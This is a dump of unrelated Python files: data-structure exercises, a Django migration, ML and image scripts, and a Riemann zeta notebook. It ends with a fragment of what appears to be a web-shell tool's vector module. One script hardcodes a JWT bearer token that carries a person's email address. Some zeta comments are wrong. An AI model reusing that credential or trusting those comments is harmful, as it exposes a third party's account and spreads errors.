Simple instantiation.
Public instance method: def sorted_insert(self, value).
"""
def __init__(self):
"""Constructor"""
self.head = None
def sorted_insert(self, value):
"""inserts a new Node into the correct sorted position
in the list (increasing order)
"""
new = Node(value)
if self.head is None:
self.head = new
return
if new.data < self.head.data:
new.next_node = self.head
self.head = new
return
current = self.head
while current.next_node and current.next_node.data < new.data:
current = current.next_node
new.next_node = current.next_node
current.next_node = new
def __str__(self):
"""Create the string for the print statement"""
string = ""
current = self.head
while current:
string += str(current.data)
string += '\n'
current = current.next_node
return string[:-1]
|
#User function Template for python3
def checkOddEven(x):
if(x % 2 == 0):
# Complete the statement below
return True
elif (x % 2 != 0):
# Complete the statement below
return False
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('basketball', '0053_auto_20160606_1919'),
]
operations = [
migrations.AddField(
model_name='dailystatline',
name='def_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='dailystatline',
name='off_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='recordstatline',
name='def_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='recordstatline',
name='off_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='seasonstatline',
name='def_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='seasonstatline',
name='off_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='statline',
name='def_team_pts',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='statline',
name='off_team_pts',
field=models.PositiveIntegerField(default=0),
),
]
|
num = 1
flt = 20.21
word = 'Thor'
sentence = '''
Star Wars
are better
than Avengers
'''
bln = True
print(f'Variable: {num}', '-', type(num))
print(f'Variable: {flt}', '-', type(flt))
print(f'Variable: {word}', '-', type(word))
print(f'Variable: {sentence}', '-', type(sentence))
print(f'Variable: {bln}', '-', type(bln))
|
'''
四键键盘问题-打印最多次A
'''
# 原始版
def max_a(N):
def dp(n, a_num, copy):
if n <= 0:
return a_num
return max(dp(n-1, a_num+1, copy), dp(n-1, a_num+copy, copy), dp(n-2, a_num, a_num))
return dp(N,0,0)
# 消除重叠子
def max_a(N):
memo = dict()
def dp(n, a_num, copy):
if n <= 0:
return a_num
if (n, a_num, copy) in memo:
return memo[(n,a_num,copy)]
memo[(n,a_num,copy)] = max(dp(n-1, a_num+1, copy), dp(n-1, a_num+copy, copy), dp(n-2, a_num, a_num))
return memo[(n,a_num,copy)]
return dp(N,0,0)
# 高配版
def max_a(N):
dp = [None] * (N+1)
dp[0] = 0
for i in range(1,N+1):
dp[i] = dp[i-1] + 1 # 按 A
for j in range(2,i):
# 全选 & 复制 dp[j-2],连续粘贴 i - j 次
# 屏幕上共 dp[j - 2] * (i - j + 1) 个 A
dp[i] = max(dp[i], dp[j-2] * (i-j+1))
print(dp)
return dp[N]
# 上面 `高配版` 的 dp 记录的是 整个N(0-N)的最高次数,空间复杂度为O(N),而实际中我们只需要数组的最后一个,所以可以继续优化
r = max_a(9)
print(r)
|
from .sgc import SGC
from .ssgc import SSGC
from .gcn import GCN
from .base_sat import BaseSAT
|
from flask import Flask
from flask_wtf.csrf import CSRFProtect
from . import auth, csrf_token, clients
def init_app(app: Flask):
csrf = CSRFProtect(app)
app.register_blueprint(auth.bp)
app.register_blueprint(csrf_token.bp)
app.register_blueprint(clients.bp)
# This bp does not have csrf protection.
# It is not required because it generates
# the csrf token.
csrf.exempt(csrf_token.bp)
|
import load_vendor_to_datalake, delete_data_datalake
#loading data from vendor source to our data mart
load_vendor_to_datalake
#deleting data from data marts that is older than X days
delete_data_datalake
|
# coding: utf-8
import requests
import time
import json
DIR_NAME = "ndl"
token = "eyJhbGciOiJSUzI1NiIsImtpZCI6ImMzZjI3NjU0MmJmZmU0NWU5OGMyMGQ2MDNlYmUyYmExMTc2ZWRhMzMiLCJ0eXAiOiJKV1QifQ.eyJuYW1lIjoidS5uYWthbXVyYS5zYXRvcnUgdSIsInBpY3R1cmUiOiJodHRwczovL2xoMy5nb29nbGV1c2VyY29udGVudC5jb20vLXBZeVhMVEpMeFE0L0FBQUFBQUFBQUFJL0FBQUFBQUFBQUFBL0FDSGkzcmVWR21aMzNBQTRXSGloWGQ0aGZfSUcyNHpIX1EvcGhvdG8uanBnIiwiaXNzIjoiaHR0cHM6Ly9zZWN1cmV0b2tlbi5nb29nbGUuY29tL2NvZGgtODEwNDEiLCJhdWQiOiJjb2RoLTgxMDQxIiwiYXV0aF90aW1lIjoxNTkyMzk3NTgyLCJ1c2VyX2lkIjoiUGwySXNUNWlVV1Z5SVZQUFFkNVNZbHZkdmV6MiIsInN1YiI6IlBsMklzVDVpVVdWeUlWUFBRZDVTWWx2ZHZlejIiLCJpYXQiOjE1OTI1MTc1MTcsImV4cCI6MTU5MjUyMTExNywiZW1haWwiOiJ1Lm5ha2FtdXJhLnNhdG9ydUBnLmVjYy51LXRva3lvLmFjLmpwIiwiZW1haWxfdmVyaWZpZWQiOnRydWUsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZ29vZ2xlLmNvbSI6WyIxMDExNzI0MzcwNTUzMjI0MjcwMDYiXSwiZW1haWwiOlsidS5uYWthbXVyYS5zYXRvcnVAZy5lY2MudS10b2t5by5hYy5qcCJdfSwic2lnbl9pbl9wcm92aWRlciI6Imdvb2dsZS5jb20ifX0.ORLwowbWPDczX92pSumFVXXgkT7NQnhf4em-0tQtdZyGoC0kFBSq_PG-fqDHxv56B_RU4Dwa_yNSN6tJcJHFnO3XMYMdyNiIlpGRM4IUzmnKirZ8fIBg1H_6j0Abw32wP3v3LF2KzVNwL0SqIa_MGCTP3hpV5JnQY_PznwRGjdL_LxbJVzD6RP_XUrBh-PFb9xoFn3R0AGilFTUrc1OZTnnWDab7KzavOmTMml-DNn9-L1El-qCJpj0bjcFu2csmZX0krugAwjoILlfDNMi4AhkpptWQfjgG6bDFGZ6xGMexbfKRb6cwCHgyLAuaRzxPrX9mnMHr_3eksy2vZHat2A"
for i in range(1, 55):
if i >= 1:
print(i)
else:
continue
manifest = "https://raw.githubusercontent.com/nakamura196/genji_curation/master/docs/iiif/"+DIR_NAME+"/"+str(i).zfill(2)+".json"
print(manifest)
with open("../../docs/iiif/"+DIR_NAME+"/"+str(i).zfill(2)+".json") as f:
df = json.load(f)
# df = requests.get(manifest).json()
sequence = df["sequences"][0]
if "canvases" not in sequence:
continue
canvases = sequence["canvases"]
# areas = ["3600,1000,2400,3000", "1200,1000,2400,3000"]
areas = ["3400,2000,2900,2800", "400,2000,2900,2800"]
# areas = ["1000,900,5000,3200"]
for j in range(len(canvases)):
canvas = canvases[j]
print(i, canvas["@id"])
prefix = canvas["images"][0]["resource"]["service"]["@id"]
for xywh in areas:
time.sleep(0.5)
#POSTパラメータは二つ目の引数に辞書で指定する
response = requests.post(
'https://mp.ex.nii.ac.jp/api/kuronet/post',
{
'image':prefix + '/'+xywh+'/full/0/default.jpg',
'manifest' : manifest,
'canvas' : canvas["@id"],
'xywh' : xywh,
'token' : token
})
#レスポンスオブジェクトのjsonメソッドを使うと、
#JSONデータをPythonの辞書オブジェクトに変換して取得できる
print(response)
|
import tensorflow.keras as keras
model = keras.models.load_model('data/dogsvscats/vgg16model-small.h5')
for layer in model.layers[:-1]:
layer.trainable = False
model.add(keras.layers.Dense(3))
model.add(keras.layers.Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer="rmsprop",
metrics=['accuracy'])
trainset = keras.preprocessing.image.ImageDataGenerator(rescale=1. / 255, validation_split=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
batchSize = 16
trainGenerator = trainset.flow_from_directory(
'data/dogsvscats/small/train',
target_size=(224, 224),
subset='training',
class_mode="categorical",
batch_size=batchSize)
validationGenerator = trainset.flow_from_directory(
'data/dogsvscats/small/train',
target_size=(224, 224),
class_mode="categorical",
subset = 'validation',
batch_size=batchSize)
model.fit(
trainGenerator,
epochs=30,
validation_data=validationGenerator,
)
model.save('data/dogsvscats/vgg16model-cows.h5')
|
#OOP paradigm
class Person:
#Class attribute//Properties
species="Homo sapien sapien"
#Methods- functions defined inside a class
#def key word
def walk(self):
print("{} Is walking".format(self.name))
def sleep(self):
print("{} Is sleeping".format(self.name)) #.format to access the instance attribute to be input with the object
p1= Person()
p2=Person()
print(p1.species)
p1.name="Stan"
p2.name="shishi"
p1.age=45
p1.job="Manager"
p1.style="Casual-smart"
p1.car="BMW"
print(p1.name)
p1.walk()
p2.sleep()
# p2.name="Mandela"
# p2.age=34
|
#!/usr/bin/env python
# coding: utf-8
# # Riemann's Zeta-Function and Riemann's Hypothesis
#
# Powered by: Dr. Hermann Völlinger, DHBW Stuttgart(Germany); May 2021
#
# Prereq.'s: you need to extract the zip-file 'Images.zip' in a directory with name 'Images'
#
# ## Item1: Riemann's Zeta-Function
#
# See: https://en.wikipedia.org/wiki/Riemann_zeta_function
#
# For a non-expert introduction about the background and history of the Riemman's Zeta Fct & Riemann's Hypothesis (in German language, Christmas Lecture 2016 of HAW Hamburg) see the following YouTube video: https://www.youtube.com/watch?v=sZhl6PyTflw&vl=en
#
# The Riemann zeta function or Euler–Riemann zeta function, zeta(s), is a function of a complex variable s that analytically
# continues the sum of the Dirichlet serie which converges when the real part of s is greater than 1.
#
# More general representations of zeta(s) for all s are given below. The Riemann zeta function plays a pivotal role in
# analytic number theory and has applications in physics, probability theory, and applied statistics.
# As a function of a real variable, Leonhard Euler first introduced and studied it in the first half of the eighteenth century
# without using complex analysis, which was not available at the time. Bernhard Riemann's 1859 article "On the Number of
# Primes Less Than a Given Magnitude" extended the Euler definition to a complex variable, proved its meromorphic continuation
# and functional equation, and established a relation between its zeros and the distribution of prime numbers.[2]
#
# The values of the Riemann zeta function at even positive integers were computed by Euler. The first of them, zeta(2), provides a solution to the Basel problem. In 1979 Roger Apéry proved the irrationality of zeta(3). The values at negative integer points, also found by Euler, are rational numbers and play an important role in the theory of modular forms.
# Many generalizations of the Riemann zeta function, such as Dirichlet series, Dirichlet L-functions and L-functions, are known.
#
# See also the following youtube video explaining in mathematical details of the Riemann's Zeta Fct. zetas(s), s = complex number and also the Riemann's Hypothesis: https://youtu.be/sD0NjbwqlYw
# ### Item1.1: Dirichlet Series of Zeta-Function
#
# https://en.wikipedia.org/wiki/Dirichlet_series
# In mathematics, a Dirichlet series is any series of the form of the following picture (see below).
# The Dirichlet series of Riemann's Zeta-Function is a complex sequence. It is a special case of general Dirichlet series.
# Dirichlet series play a variety of important roles in analytic number theory. The most usually seen definition of the
# Riemann zeta function is a Dirichlet series, as are the Dirichlet L-functions.
# In[1]:
print("** DirichletForm of the Riemann Zeta-Fuction (Euler-Function)**")
#print("LATEX syntax zeta(s), re(s)>1:$ \zeta(s)=\sum_{n=1}^\infty 1/n^s $")
from IPython.display import Image
Image('Images/DirichletForm4Riem-ZetaFct.jpg')
# ### Item1.2: The Basel Problem
# The Basel problem is a problem in mathematical analysis with relevance to number theory, first posed by Pietro Mengoli in 1650 and solved by Leonhard Euler in 1734,[1] and read on 5 December 1735 in The Saint Petersburg Academy of Sciences.[2] Since the problem had withstood the attacks of the leading mathematicians of the day, Euler's solution brought him immediate fame when he was twenty-eight. Euler generalised the problem considerably, and his ideas were taken up years later by Bernhard Riemann in his seminal 1859 paper "On the Number of Primes Less Than a Given Magnitude", in which he defined his zeta function and proved its basic properties. The problem is named after Basel, hometown of Euler as well as of the Bernoulli family who unsuccessfully attacked the problem.
#
# The Basel problem asks for the precise summation of the reciprocals of the squares of the natural numbers, i.e. the precise sum of the infinite series:
#
# The sum of the series is approximately equal to 1.644934.[3] The Basel problem asks for the exact sum of this series (in closed form), as well as a proof that this sum is correct. Euler found the exact sum to be pi²/6 and announced this discovery in 1735. His arguments were based on manipulations that were not justified at the time, although he was later proven correct. He produced a truly rigorous proof in 1741.
# In[2]:
print("Consider the special case s = 2 + i*0, so we get the follw. series:")
print("** This is the famous 'Basel-Problem' solved by L. Euler in 1735 **")
from IPython.display import Image
Image('Images/Basel_Problem.jpg')
# ### Item1.3: Riemann's Zeta Fct for Complex Numbers
# If you extend the Dirichlet series on the whole complex plane, Riemann found a nice formula, which we call complex Riemann Zeta-Fct. (cRZ). The following picture show the formula.
# In[3]:
print("*** This is the famous Riemann Zeta(s)-Fct. for s=complex numbers ***")
from IPython.display import Image
Image('Images/complex_RiemannZeta-Formula.jpg')
# ### Item1.4: Euler Product Formula
#
# https://en.wikipedia.org/wiki/Proof_of_the_Euler_product_formula_for_the_Riemann_zeta_function
#
# Leonhard Euler proved the Euler product formula for the Riemann zeta function in his thesis Variae observationes circa series infinitas (Various Observations about Infinite Series), published by St Petersburg Academy in 1737.[1][2]
#
# In[4]:
print ("******************************************************************************")
print ("** The bridge between Riemann Zeta-fct in Complex Analysis and prime numbers *")
print ("* in Number Theory is given by the Euler Product, which Euler proved in 1735 *")
print ("******************************************************************************")
from IPython.display import Image
Image('Images/EulerProduct.jpg')
# ## Item2: Riemann's Hypothesis
#
# See: https://en.wikipedia.org/wiki/Riemann_hypothesis
#
# In mathematics, the Riemann hypothesis is a conjecture that the Riemann zeta function has its zeros only at the negative even integers and complex numbers with real part = 1/2.
# Many consider it to be the most important unsolved problem in pure mathematics.[1] It is of great interest in number theory because it implies results about the distribution of prime numbers. It was proposed by Bernhard Riemann (1859), after whom it is named.
# The Riemann hypothesis and some of its generalizations, along with Goldbach's conjecture and the twin prime conjecture, comprise Hilbert's eighth problem in David Hilbert's list of 23 unsolved problems; it is also one of the Clay Mathematics Institute's Millennium Prize Problems. The name is also used for some closely related analogues, such as the Riemann hypothesis for curves over finite fields.
# The first six zeros of zeta(s) are at s = 0.5 +/- 14.134725i; s=0.5 +/- 21.022040i; s = 0.5 +/- 25.010858i
# ### Item2.1: Zero-free region of Zeta-Function
#
# Apart from the trivial zeros, the Riemann zeta function has no zeros to the right of σ = 1 and to the left of σ = 0
# (neither can the zeros lie too close to those lines). Furthermore, the non-trivial zeros are symmetric about the
# real axis and the line σ = 1/2 and, according to the Riemann hypothesis, they all lie on the line σ = 1/2.
# In[5]:
print ("*** Zero-free_region_for_the_Riemann_zeta-function**** ")
from IPython.display import Image
Image('Images/Zero-free_region_for_the_Riemann_zeta-function.jpg')
# In[6]:
print (" ************************************************************ ")
print (" *** Here is an example-plot of the riemann zeta-function *** ")
print (" **** See non-trival zeros at 'critical' line real(z)=0.5 *** ")
print (" **** This is a visualization of the Riemann-Hypothesis ***** ")
print (" ************************************************************ ")
from IPython.display import Image
Image('Images/riemann-zeta1.jpg')
# In[7]:
print ("***********************************************************************")
print ("*** Example-plot of zeta(s) in the range |re(s)|< 6 & |im(s)|< 20i ****")
print ("*** In this range we see zeros at the points s = 0.5 +/- 14,134725i ***")
print ("***********************************************************************")
from IPython.display import Image
Image('Images/riemann-zeta2.jpg')
# ### Item 2.2: Main Program Code for calculation of Zeta(s), s=complex number
#
# This is the Program/Source Code (in Python) using complex the Riemann's Zeta-Fct (cRZ) for complex numbers (see above).
# Rounding errors may occur when we are using the cRZ formula, because this is an approximation method for the determination
# of zeta(s). The parameter t is defining the granularity of the approximation. Choosing smaller t, i.e. t=50 the rounding error will become smaller.
# The program will be executed later in the JN, when we calculate zeta(s), where s are special real numbers.
# For definition of the main pgm, we import the libray itertools, which inlude functions creating iterators for efficient looping.
#
# We use the python library Intertools: it's creating complex iterators which helps in getting faster execution time and writing memory-efficient code. Itertools provide us with functions for creating infinite sequences and itertools.
#
# count() is a second such function and it does exactly what it sounds like, it counts!
#
# itertools.islice(iterable, start, stop[, step]):Make an iterator that returns selected elements from the iterable. See also
# https://docs.python.org/3/library/itertools.html#itertools.islice
#
# scipy.special.binom(n,k) are the binomial coefficient n over k := n!/[(n-k)!k!]
# In[8]:
# Import libaries
from itertools import count, islice
from scipy.special import binom
# Program/Source Code (Python)using complex Riemann's Zeta-Fct (cRZ) for complex Numbers
# It is using the complex RiemannZeta formula (cRZ); see above
print ("** Because the cRZ method is an approximation method, rounding errors occur in the calculation of zeta(s,t) **")
print ("** Choosing a smaller value t, i.e. t=50 the error will get smaller if im(s)=0, try this out for other cases **")
print ("** During testing we found the best results with t=10 if im(s)=0; for other cases this may be wrong, try it! **")
def zeta(s, t = 100):
if s == 1:
return float("inf")
term = (1 / 2 ** (n + 1)
* sum((-1) ** k * binom(n, k) * (k +1 ) ** -s
for k in range (n + 1))
for n in count(0))
return sum(islice(term, t)) / (1 - 2 ** (1- s))
print(" ")
print ("*** This ends the definition of main function zeta(s,t). Next we run some tests: ***")
print (" ")
print ("*** We calculate now the first six zeros of zeta(s); j denotes the imaginary unit: ***")
# The first six zeros of zeta(s) are at s = 0.5 +/- 14.134725i; s=0.5 +/- 21.022040i; s = 0.5 +/- 25.010858i
print (" ")
print ("zeta(0.5+14.134725j) =",zeta(0.5+14.134725j))
print ("zeta(0.5-14.134725j) =",zeta(0.5-14.134725j))
print (" ")
print ("zeta(0.5+21.022040j) =",zeta(0.5+21.022040j))
print ("zeta(0.5-21.022040j) =",zeta(0.5-21.022040j))
print (" ")
print ("zeta(0.5+25.010858j) =",zeta(0.5+25.010858j))
print ("zeta(0.5-25.010858j) =",zeta(0.5-25.010858j))
# ### Item2.3: 3-dim. Plot of Riemann Zeta Fct. for complex plane
#
# Lines in the complex plane where the Riemann zeta function is real (green) depicted on a relief representing the positive absolute value of zeta for arguments s, sigma and tau, where the real part of zeta is positive, and the negative absolute value of zeta where the real part of zeta is negative.
# This representation brings out most clearly that the lines of constant phase corresponding to phases of integer multiples of 2pi run down the hills on the left-hand side, turn around on the right and terminate in the non-trivial zeros.
# This pattern repeats itself infinitely many times. The points of arrival and departure on the right-hand side of the picture are equally spaced and given by equation (cRZ).
# In[9]:
print ("*** 3-dim. Plot of Riemann Zeta Fct. for complex plane / Explanation see above ***")
from IPython.display import Image
Image('Images/Plot-complex_RiemannZeta-Fct.jpg')
# ### Item2.4: Calulate Zeta(s) for s=integer.
#
# We calcualate here some special values of the Riemann Zeta function Zeta(s), where s is a complex number, with Im(s)=0
# and s is an integer. So we list up the values of Zeta(s) with s = {-2, -1, 0, 1, 2, 3, 4, 6, 8}.
# For s=2 we see the famous Basel-problem (see Item1.2 above).
#
# We are using the pgm. defined above under the item: 'Main Program Code for calculation of Zeta(s), s=complex number'.
#
# To crosscheck the results you can use for example the Wolfram Alpha program in the internet:https://www.wolframalpha.com/
#
# For example zeta(7): https://www.wolframalpha.com/input/?i=zeta%28-7%29 or zeta(2): https://www.wolframalpha.com/input/?i=zeta%282%29
#
# We will proof in the next steps, that lim(Zeta(s))=1 when s goes in the direction of infinity.
#
# For s=2k (k=1,2,3,...), we see can define the values of Zeta(2k) with Bernoulli numbers Bk...
# See Bronstein, page 254, Formula '19.' (red box).
# In[10]:
print ("*** Bernoulli Numbers Bk ***")
from IPython.display import Image
Image('Images/bernoulli_numbers.jpg')
# In[11]:
print ("******************************************")
print ("*** examples: Zeta(s) for s = integers ***")
print ("******************************************")
# 1. zeta(s)=0 for s=-7,-5,-3
print ("*********** 1. check ************")
print ("*** zeta(-7) = 0,00416666... ****")
print ("zeta(-7) =",zeta(-7))
print ("*** zeta(-5) = -0,00396825... ***")
print ("zeta(-5) =",zeta(-5))
print ("**** zeta(-3) = 0,00833333... ***")
print ("zeta(-3) =",zeta(-3))
# 2. zeta(-2)=0
print ("*********** 2. check ************")
print ("*** zeta(-2) = 0 ****************")
print ("zeta(-2) =",zeta(-2))
# 3. zeta(-1)=-1/12=-0,08333333...
print ("************* 3. check *****************")
print ("*** zeta(-1) = -1/12 = -0,08333333... **")
# 4. zeta(0)=-1/2
print ("************* 4. check *****************")
print ("*** zeta(0) = -1/2 *********************")
print ("zeta(0) =",zeta(0))
# 5. zeta(1)=inifinity
print ("************* 5. check *****************")
print ("*** zeta(1)=unendlich(inf) *************")
print ("zeta(1) =",zeta(1))
# 6. zeta(2)=pi²/6 Bernoulli formula,k=1
print ("**************** 6. check *****************")
print ("*** zeta(2)=pi²/6 Bernoulli formula,k=1 ***")
print ("*** zeta(2)=pi²/6=1,64493406... ***********")
print ("zeta(2) =",zeta(2))
# 7. zeta(3)=1,2020...
print ("************** 7. check *******************")
print ("*** zeta(3)= 1,202056...*******************")
print ("zeta(3) =",zeta(3))
# 8. zeta(4)=(pi²)²/90 Bernoulli formula,k=2
print ("************* 8.check **********************")
print ("** zeta(4)=(pi²)²/90 Bernoulli formula,k=2 *")
print ("** zeta(4)=((pi²))²/90 = 1,08232323... *****")
print ("zeta(4) =",zeta(4))
# 9. zeta(5)=1,0369277...
print ("************* 9.check **********************")
print ("*** zeta(5)=1,0369277... *******************")
print ("zeta(5) =",zeta(5))
# 10. zeta(6)=(pi²)³/945 Bernoulli formula,k=3
print ("************** 10.check *********************")
print ("** zeta(6)=(pi²)³/945 Bernoulli formula,k=3 *")
print ("** zeta(6)=(pi²)³/945 = 1,01734330... *******")
print ("zeta(6) =",zeta(6))
# 11. zeta(7)=1,008349...
print ("************** 11.check *********************")
print ("*** zeta(7)=1,008349...**********************")
print ("zeta(7) =",zeta(7))
# 12. zeta(8)=(pi²)²)²/9450 Bernoulli formula,k=4
print ("*************** 12. check ************************")
print ("** zeta(8)=((pi²)²)²/9450 Bernoulli formula,k=4 **")
print ("** zeta(8)=1,00407735... *************************")
print ("zeta(8) =",zeta(8))
# 13. zeta(s) for s=50,100,201,500, 1201
print ("**************** 13. check************************")
print ("*** zeta(s) for s = 50,100,500,1000,10000 to ****")
print ("*** check [lim(s->inf)](zeta(s))=1 for s=int> 1 **")
print ("**************************************************")
print ("zeta(50) =",zeta(50))
print ("***************** check zeta(100) ***********************")
print ("** https://www.wolframalpha.com/input/?i=zeta%28100%29 **")
print ("zeta(100) =",zeta(100))
print ("zeta(500) =",zeta(500))
print ("zeta(1000) =",zeta(1000))
print ("zeta(10000) =",zeta(10000))
# ### Item2.5: Riem. Fct. Equation (RFE) using Gamma-Fct. & Trivial zeros of Zeta-Fct
#
# We calcualate here some special values with trival zeros of the Riemann Zeta function Zeta(s), where s is a complex number,
# with Im(s)=0. So we list up the values of Zeta(s) with s = {-8, -6, -4, -2}.
# In addition we calculate also some Zeta(s) where s is a fracture number.
#
# The zeta function satisfies the 'Riemann's Functional Equation (RFE)' - see image below:
#
# This is an equality of meromorphic functions valid on the whole complex plane. The equation relates values of the
# Riemann zeta function at the points s and 1 − s, in particular relating even positive integers with odd
# negative integers. Owing to the zeros of the sine function, the functional equation implies that zeta(s) has a
# simple zero at each even negative integers = −2n, known as the trivial zeros of zeta(s). When s is an even positive
# integer, the product sine(pi*s/2)* gamma(1 − s) on the right is non-zero because gamma(1 − s) has a simple pole,
# which cancels the simple zero of the sine factor.
# In[12]:
print ("**********************************************************************************")
print ("*** The zeta func. zeta(s) satisfies the 'Riemann's Functional Equation (RFE)' ***")
print ("**********************************************************************************")
from IPython.display import Image
Image('Images/Riemann_functional_equation.JPG')
# In[13]:
print ("**********************************************************************************")
print ("***** 3-dimensional plot of the absolute value of the complex gamma function *****")
print ("*** we also see the poles of gamma(z) where z=-n, n=1,2,3... (natural numbers) ***")
print ("**********************************************************************************")
from IPython.display import Image
Image('Images/Plot-complex_gamma-fct.JPG')
# In[14]:
print("******************************************************")
print("** 'Calculate zeta(s) for s=-1,-3,-5,-7 by using RFE **")
print("*******************************************************")
# 1. zeta(-1)=-1/12
print ("zeta(-1)=(1/2pi²)*sin(-pi/2)*gamma(2)*zeta(2)")
print (" =(1/2pi²)*(-1)*1*(pi²/6)=-1/12 ")
# 2. zeta(-3)=1/120
print ("*************************************************")
print ("zeta(-3)=(1/8(pi²)²)*sin(-3pi/2)*gamma(4)*zeta(4)")
print (" =(1/8(pi²)²)*(+1)*3!*((pi²)²/90)=6/(8*90)")
print (" =6/720=1/120 ")
# 3. zeta(-5)=-1/252
print ("**************************************************")
print ("zeta(-5)=(1/32(pi²)³)*sin(-5pi/2)*gamma(6)*zeta(6)")
print (" =(1/32(pi²)³)*(-1)*5!*((pi²)³/945) ")
print (" =-120/(32*945)=-1/(4*63)=-1/252 ")
# 4. zeta(-7)=1/240
print ("******************************************************")
print ("zeta(-7)=(1/128((pi²)²)²)*sin(-7pi/2)*gamma(8)*zeta(8)")
print (" =(1/128((pi²)²)²)*(+1)*7!*(((pi²)²)²/9450) ")
print (" =5040/(128*9450)=504/(128*945)=63/(16*945) ")
print (" =1/(16*15)=1/240 ")
# In[15]:
print("************************************************")
print("** 'Trivial' zeros are for z=-2,-4,-6,-8,etc. **")
print("************************************************")
# 1. zeta(-2)=0
print ("1. check zeta(-2)=0:")
print ("zeta(-2) =",zeta(-2))
# 2. zeta(-4)=0
print ("***************************************")
print ("2. check zeta(-4)=0:")
print ("zeta(-4) =",zeta(-4))
# 3. zeta(-6)=0
print ("**************************************")
print ("3. check zeta(-6)=0:")
print ("zeta(-6) =",zeta(-6))
# 4. zeta(-8)=0
print ("**************************************")
print ("4. check zeta(-8)=0:")
print ("zeta(-8) =",zeta(-8))
# In[16]:
# Calculate zeta(s) for fracture numbers s=-15/2,-13/2,...,15/2
print ("**********************************************************")
print ("**** calculate values for s = -15/2, -13/2, ..., 15/2 ****")
print ("*** check the results for s = -3/2, -1/2 and 1/2 using ***")
print ("*** the Riemann's Functional Equation (RFE); see above ***")
print ("**********************************************************")
print ("zeta(-15/2) =",zeta(-15/2))
print ("zeta(-13/2) =",zeta(-13/2))
print ("zeta(-11/2) =",zeta(-11/2))
print ("zeta(-9/2) =",zeta(-9/2))
print ("zeta(-7/2) =",zeta(-7/2))
print ("zeta(-5/2) =",zeta(-5/2))
print ("with RFE follows zeta(-3/2)=(-3/16)*(1/pi²)*zeta(5/2)")
print ("using zeta(5/2),see below,the correct result is found")
print ("zeta(-3/2) =",zeta(-3/2))
print ("with RFE we see that zeta(-1/2)=(-1/4)*(1/pi)*zeta(3/2)")
print ("using zeta(3/2), see below, the correct result is found")
print ("zeta(-1/2) =",zeta(-1/2))
print ("RFE=> zeta(1/2)=(2/2)*root((pi/pi))*zeta(1/2) is correct!")
print ("zeta(1/2) =",zeta(1/2))
print ("zeta(3/2) =",zeta(3/2))
print ("zeta(5/2) =",zeta(5/2))
print ("zeta(7/2) =",zeta(7/2))
print ("zeta(9/2) =",zeta(9/2))
print ("zeta(11/2) =",zeta(11/2))
print ("zeta(13/2) =",zeta(13/2))
print ("zeta(15/2) =",zeta(15/2))
# ### Item2.6: Summary of Results: Values+Graph of Riem. Zeta(s) Fct. with Im(s)=0
#
# As a summary and final result of the above work we show the graph of zeta(s)where Im(s)=0, s.t. s=real mumber (without s=1). We use also the calculated values of zeta(s) from this Jupyter Notebook and summaries them in a small table (see below).
# Remarks: We see a pole of zeta(s) at s=1 and an asymtote at f(s)=1 for s>1.
# Compare also the remarks about the lim(zeta(s)) for s which goes to the positive
# infinity: lim(s->+inf)=1.
# In[17]:
print ("**** Value-Table of Riem. Zeta(s) Fct. with Im(s)=0 ****")
from IPython.display import Image
Image('Images/Value_Zeta(s)_Im(s)=0.JPG')
# In[18]:
print ("****** Graph of Riem. Zeta(s) Fct. with Im(s)=0 ******")
from IPython.display import Image
Image('Images/Graph_Zeta(s)_Im(s)=0.JPG')
# In[19]:
import time
print("****current date and time **************")
print("Date and Time:",time.strftime("%d.%m.%Y %H:%M:%S"))
print("end")
|
'''
Created on Jul 14, 2012
@author: jon
'''
from struct import unpack
def parse(data):
while 1:
# Parse payload length
length_bytes = data.read(2)
if not length_bytes:
break
packet_length = unpack('>H', length_bytes)[0]
# Parse payload (rest of packet)
packet_payload = data.read(packet_length)
if not packet_payload:
break
yield packet_payload
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 14:16:33 2018
@author: thomas
"""
def main():
#nvert_bot1up = 4921
#nvert_bot1low = 1330
nvert_boundary = 34878
Ks = 1.0e6
f = open('boundary.target','w')
f.write("%i\n" %(nvert_boundary))
for i in range(nvert_boundary):
f.write("%i %.3e\n" % (i,Ks))
f.close()
'''f = open('botup1.target','w')
f.write("%i\n" %(nvert_bot1up))
for i in range(nvert_bot1up):
f.write("%i %.3e\n" % (i,Ks))
f.close()
f = open('botlow1.target','w')
f.write("%i\n"%(nvert_bot1low))
for i in range(nvert_bot1low):
f.write("%i %.3e\n" %(i,Ks))
f.close'''
#--------------------END OF MAIN---------------------
main()
|
from PIL import Image
img_input = Image.open('lena.bmp')
img_output = Image.new(img_input.mode, img_input.size )
pixels_input = img_input.load()
pixels_output = img_output.load()
# upside-down
for x in range(img_output.height):
for y in range(img_output.width):
pixels_output[x, y] = pixels_input[x, img_output.width - y - 1]
img_output.save('upside-down.bmp')
# rightside-left
for x in range(img_output.height):
for y in range(img_output.width):
pixels_output[x, y] = pixels_input[img_output.height - x - 1, y]
img_output.save('rightside-left.bmp')
# diagonally mirrored
for x in range(img_output.height):
for y in range(img_output.width):
pixels_output[x, y] = pixels_input[y, x]
img_output.save('diagonally-mirrored.png')
|
"""
The module `core.vectorlist` defines a `VectorList` object, normally used
to store the module vectors.
Module class executes `_register_vectors()` at init to initialize the `VectorList`
object as `self.vectors` module attribute.
The methods exposed by VectorList can be used to get the result of a
given vector execution with `get_result()`, get all the results of a bunch of
vectors with `get_results()`, or get the result of the first vector that
response in the way we want with `find_first_result()`.
"""
from core.vectors import Os
from mako.template import Template
from core.weexceptions import DevException, ModuleError
from core.loggers import log, dlog
from core import modules
from core import utilities
from core import messages
class VectorList(list):
def __init__(self, session, module_name):
self.session = session
self.module_name = module_name
list.__init__(self)
def find_first_result(self, names = [], format_args = {}, condition = None, store_result = False, store_name = ''):
